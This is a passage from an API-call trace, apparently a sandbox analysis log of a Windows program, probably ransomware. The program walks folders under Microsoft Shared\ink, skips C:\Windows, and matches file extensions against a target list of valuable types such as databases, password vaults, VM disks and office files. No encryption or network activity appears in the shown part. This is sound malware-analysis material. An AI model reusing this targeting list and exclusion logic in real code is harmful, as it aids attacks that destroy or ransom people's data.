FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.885] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.885] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.885] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="es-ES" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES" [0039.885] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES") returned 0x0 [0039.885] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*" [0039.885] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.886] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.886] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.886] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\tipresx.dll.mui" [0039.886] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.886] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.886] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.886] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.886] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.886] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.886] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="et-EE" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE" [0039.886] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE") returned 0x0 [0039.886] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*" [0039.886] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.888] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.888] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.888] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui" [0039.888] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.888] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.889] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.889] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.889] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.889] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.889] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="fi-FI" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI" [0039.889] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI") returned 0x0 [0039.889] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*" [0039.889] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.889] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.890] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.890] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui" [0039.890] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.890] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.890] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.890] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.890] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.890] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.890] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="FlickAnimation.avi" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" [0039.890] PathFindExtensionW (pszPath="FlickAnimation.avi") returned=".avi" [0039.890] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".avi.") returned 5 [0039.890] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".avi.") returned 0x0 [0039.890] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.890] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="FlickLearningWizard.exe" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe" [0039.890] PathFindExtensionW (pszPath="FlickLearningWizard.exe") returned=".exe" [0039.891] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".exe.") returned 5 [0039.891] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".exe.") returned 0x0 [0039.891] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.891] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="fr-FR" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR" [0039.891] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR") returned 0x0 [0039.891] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*" [0039.891] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.891] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.891] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.891] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui" [0039.892] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.892] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.892] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.892] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.892] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.892] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.892] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="fsdefinitions" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions" [0039.892] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned 0x0 [0039.892] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*" [0039.892] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.896] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.896] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.896] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="auxpad" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad" [0039.896] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad") returned 0x0 [0039.896] PathCombineW (in: pszDest=0x2e4c0a0, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*" [0039.896] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*", lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0x54ade0 [0039.898] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.898] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.898] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad", pszFile="auxbase.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" [0039.898] PathFindExtensionW (pszPath="auxbase.xml") returned=".xml" [0039.898] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.898] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.898] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0 [0039.898] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0039.899] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.899] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="auxpad.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" [0039.899] PathFindExtensionW (pszPath="auxpad.xml") returned=".xml" [0039.899] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.899] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.899] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.899] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="keypad" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad" [0039.899] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad") returned 0x0 [0039.899] PathCombineW (in: pszDest=0x2e4c0a0, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*" [0039.899] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*", lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0x54ade0 [0039.900] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.900] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.900] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad", pszFile="ea.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" [0039.900] PathFindExtensionW (pszPath="ea.xml") returned=".xml" [0039.900] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.900] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.900] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.900] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad", pszFile="keypadbase.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" [0039.900] PathFindExtensionW (pszPath="keypadbase.xml") returned=".xml" [0039.900] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.900] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.900] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.900] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad", pszFile="kor-kor.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" [0039.901] PathFindExtensionW (pszPath="kor-kor.xml") returned=".xml" [0039.901] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.901] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.901] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0 [0039.901] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0039.901] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.901] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="keypad.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" [0039.901] PathFindExtensionW (pszPath="keypad.xml") returned=".xml" [0039.901] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.901] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.902] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.902] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="main" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main" [0039.902] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 0x0 [0039.902] PathCombineW (in: pszDest=0x2e4c0a0, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\*" [0039.902] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\*", lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0x54ade0 [0039.924] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.924] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.924] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", pszFile="base.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" [0039.924] PathFindExtensionW (pszPath="base.xml") returned=".xml" [0039.924] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.924] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.924] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.924] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", pszFile="baseAltGr_rtl.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" [0039.925] PathFindExtensionW (pszPath="baseAltGr_rtl.xml") returned=".xml" [0039.925] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.925] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.925] FindNextFileW 